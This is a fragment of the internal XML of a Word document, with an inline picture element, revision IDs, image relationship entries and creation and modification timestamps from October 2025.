          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C8876F8" wp14:editId="7E3AA414">
            <wp:extent cx="5848651" cy="3721291"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="184794322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43224" name="Picture 184794322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651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6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0EA"/>
    <w:rsid w:val="000127A3"/>
    <w:rsid w:val="004E3B71"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="007E20EA"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00F56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D4996"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FBCE91C9-DF40-4D2A-B607-2BB34609F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0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0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0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0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0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jpeg"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.tmp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jpeg"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.tmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpeg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</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-09T08:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-09T08:30:00Z</dcterms:modified>
</cp:coreProperties>
</file>